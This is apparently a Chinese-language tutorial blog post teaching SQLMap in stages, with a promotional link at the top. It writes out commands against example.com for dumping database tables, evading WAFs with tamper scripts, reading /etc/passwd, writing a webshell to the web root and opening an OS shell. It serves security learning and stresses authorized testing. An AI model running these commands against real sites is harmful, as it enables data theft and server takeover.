下课仔：xingkeit.top/7217/

一张图看懂 SQLMap：从入门到精通不迷路

在网络安全领域，SQLMap 是一个几乎无人不知的名字。这个开源的自动化 SQL 注入工具，凭借其强大的检测能力和丰富的功能，成为安全测试人员手中最锋利的武器之一。但很多初学者面对它时，往往被海量的参数和选项淹没，不知道从哪开始，也不知道每一步该做什么。

如果把 SQLMap 的学习路径画成一张图，它会是什么样的？从入门到精通，其实有一条清晰的脉络可循。

第一阶段：入门——跑通第一个注入

初学者的第一个目标，不是搞懂所有参数，而是让 SQLMap 跑起来，看到一个真实的注入结果。

核心命令：

sqlmap -u "http://example.com/page?id=1"

这行命令告诉 SQLMap：去检测这个 URL 的 id 参数是否存在注入漏洞。SQLMap 会自动发送各种 payload，分析响应，判断是否存在注入点。

如果检测到注入，它会进一步问：要不要获取数据库信息？要不要继续？对于初学者，建议先选“Y”，看看它能挖出什么。

这个阶段需要理解的三件事：

第一，SQLMap 的原理是“基于响应的判断”——它发送特殊构造的请求，通过页面的变化、错误信息、响应时间等特征，判断是否存在注入。

第二，不是所有参数都能测出来。如果页面有 WAF（Web应用防火墙），或者参数经过了特殊处理，SQLMap 可能会被拦住。这时候需要后面学到的绕过技术。

第三，只在授权环境下测试。这一点怎么强调都不过分——用 SQLMap 扫未经授权的网站，是违法行为。

第二阶段：进阶——掌握核心参数

跑通第一个注入之后，就可以开始理解 SQLMap 的核心功能了。这些功能可以分成几类：

信息获取类：

# 获取数据库信息sqlmap -u "http://example.com/page?id=1" --banner# 列举数据库名sqlmap -u "http://example.com/page?id=1" --dbs# 列举指定数据库的表名sqlmap -u "http://example.com/page?id=1" -D database_name --tables# 列举表的列名sqlmap -u "http://example.com/page?id=1" -D database_name -T table_name --columns# 导出数据sqlmap -u "http://example.com/page?id=1" -D database_name -T table_name --dump

这组命令是 SQLMap 最常用的功能——从数据库到表到列到数据，一层层剥开。

请求定制类：

很多场景下，目标网站需要登录、需要特定的 Cookie、或者需要 POST 数据提交。

# 带 Cookie 访问sqlmap -u "http://example.com/page?id=1" --cookie="PHPSESSID=abc123"# POST 方式提交数据sqlmap -u "http://example.com/login" --data="user=admin&pass=123"# 指定请求头sqlmap -u "http://example.com/page?id=1" --headers="X-Forwarded-For: 127.0.0.1"

这些参数让 SQLMap 能够适应各种复杂的测试环境。

第三阶段：深入——绕过与对抗

现实世界的网站很少让 SQLMap 舒舒服服地跑。WAF、防护机制、过滤规则，都在等着拦住你。这一阶段学的，是怎么绕过它们。

绕过 WAF 的基本手段：

# 使用随机 User-Agentsqlmap -u "http://example.com/page?id=1" --random-agent# 降低请求速度，避免触发防护sqlmap -u "http://example.com/page?id=1" --delay=2# 使用参数混淆sqlmap -u "http://example.com/page?id=1" --tamper=space2comment

--tamper 是 SQLMap 最强大的绕过工具之一。它相当于一个脚本引擎，可以在发送 payload 之前对其进行各种变形——空格转注释、大小写混淆、关键字编码，目的是让 WAF 认不出来这是 SQL 注入攻击。

内置的 tamper 脚本有几十个，常用的包括：

• space2comment：空格替换成注释

• between：用 BETWEEN 替换比较符

• greatest：用 GREATEST 替换比较符

• multiplespaces：添加多个空格绕过正则

更进阶的用法，是把多个 tamper 组合起来使用：

sqlmap -u "http://example.com/page?id=1" --tamper=space2comment,between,randomcase

第四阶段：精通——利用与提权

当注入漏洞被确认，数据也被成功导出，真正的考验才刚开始——怎么利用这个漏洞获取更大价值？这一阶段的学习，是把 SQLMap 从“数据提取工具”变成“权限拓展工具”。

文件系统访问：

如果当前数据库用户有足够权限，SQLMap 可以读取甚至写入服务器文件。

# 读取文件sqlmap -u "http://example.com/page?id=1" --file-read="/etc/passwd"# 写入文件（可用于写 webshell）sqlmap -u "http://example.com/page?id=1" --file-write="/local/shell.jsp" --file-dest="/var/www/html/shell.jsp"

操作系统命令执行：

在更理想的情况下，如果数据库支持且权限足够，可以直接执行系统命令。

# 尝试获取 OS Shellsqlmap -u "http://example.com/page?id=1" --os-shell

一旦拿到 os-shell，就意味着从“数据库权限”升级到了“服务器权限”，可以做的就更多了。

第五阶段：实战——综合运用与报告

精通的标志，不是会用所有参数，而是在真实测试中能够灵活组合这些技术，高效地完成测试任务，并输出有价值的报告。

常用技巧组合：

# 带 Cookie、POST 数据、使用 tamper、只检测指定技术sqlmap -u "http://example.com/login" --data="user=admin&pass=123" --cookie="session=xyz" --tamper=space2comment --technique=BEUS# 批量检测多个 URLsqlmap -m urls.txt --batch --random-agent

输出报告：

sqlmap -u "http://example.com/page?id=1" --dump --batch --output-dir=/reports/project1

生成的日志和结果文件，可以作为漏洞报告的原始依据。

一张图总结

把这条学习路径画成一张图，大概是这样的：

入门层：单参数检测 → 确认注入存在
信息层：获取库名 → 表名 → 列名 → 数据
请求层：Cookie → POST → 自定义头
绕过层：延迟 → 随机UA → tamper脚本组合
利用层：文件读取 → 文件写入 → OS命令执行
实战层：批量检测 → 综合运用 → 报告输出

每个阶段都有自己的核心技能，下一阶段依赖前一阶段的基础。从最简单的 -u 开始，一步步走到 --os-shell，中间的路清晰可见。

最后的话

SQLMap 的强大，在于它把复杂的注入技术自动化了。但工具再强，也替代不了人的判断——什么时候该用哪个参数，怎么解读输出结果，怎么在测试中保护目标系统不受损害，这些都需要在实践中慢慢积累。

更重要的是，技术本身没有善恶，关键在于使用它的人。把 SQLMap 当作学习的工具、授权的测试工具，它能帮你深入理解 Web 安全的本质；如果用于非法攻击，它就是伤人的利器。

从入门到精通，SQLMap 的学习之路并不复杂。复杂的是，在掌握它之后，选择怎么用它。